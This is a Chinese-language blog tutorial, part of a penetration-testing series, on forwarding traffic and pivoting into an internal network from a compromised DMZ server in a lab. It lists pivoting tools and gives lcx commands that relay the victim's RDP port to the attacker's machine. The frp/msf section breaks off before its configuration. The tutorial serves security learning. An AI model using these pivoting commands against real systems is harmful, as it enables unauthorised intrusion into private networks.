渗透测试之内网渗透(三):流量转发

一、前言

在拿到一台服务器的shell的时候,如果想要更进一步渗透测试,则需要进行内网渗透

而内网渗透的第一步就是挂代理,首先需要明确一个概念,在日常生活中常用vpn挂代理去google查资料,自己搭过vpn的人都知道,要在买的vps上搭建ss的服务器端,之后在自己电脑上下载ss的客户端,确定对应的加密协议和密码就能成功转发

而在内网渗透的流量转发是一个道理,是在拿到shell的服务器上使用工具让它变成代理的服务器端,之后在本机使用客户端工具进行连接

二、流量转发工具

需要放在拿到shell的服务器的服务器端可使用

1.lcx

2.msf

3.cobalt Strike

4.earthworm

5.reGeorg

本地的客户端可以使用

windows

1.proxifier

2.SocksCap64

linux

1.proxychains

三、本次测试的环境

本次环境是公司搭的一个一层内网学习环境,本篇文章只总结流量转发的方法,因此大致介绍下简化的拓扑结构

攻击机:

ip:10.86.0.87 win10(该ip能访问到最外层的DMZ区web服务器)

ip: xx.xx.xx.xx kali (虚拟机,与主机win10 进行NAT连接)

被攻击机:

ip: 172.16.3.145 ,192.168.93.143 web服务器(双网卡,192为内网ip)

ip: 192.168.93.138 内网服务器,上面80有个IIS服务(能访问到该web,则说明代理成功)

明确个概念

那么DMZ区服务器弹shell到kali虚拟机要通过本机做端口映射,kali要访问内网web服务器则代理需要设置成本机的端口

四、lcx转发

本工具只是端口流量转发,并不具备完整的proxy代理功能

举个例子服务器只能本地连3389,因此攻击机连不了,但是可以通过该工具将3389转发到攻击机的端口上,就能连接了

拿到shell后,上传lcx.exe文件

将自身端口流量转发到攻击机端口上

使用方法

本机

接收2333端口来的流量,并在自己的2334端口打开

lcx.exe –listen 2333 2334

目标服务器

将自己的3389的流量转发到10.86.0.87攻击机的2333端口上

lcx.exe -slave 10.86.0.87 2333 127.0.0.1 3389

rdp连接自己的2334端口

本身流量转发

这玩意儿还能在自己的上进行端口转发,比如把3389端口流量转到自己的2333端口

lcx.exe -tran 2333 127.0.0.1 3389

五、msf

msf它本身有流量转发的模块,因为本次的msf是在kali虚拟机里面的,又因为DMZ区服务器是没法访问到kali的,意味着反弹shell是没法直接实现的

在使用msf转发前,使用frp将kali的监听端口映射到本机上

在本机中使用frps服务器端

frps.ini的配置如下,确定绑定的端口,token的值,转发的端口,即可

  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值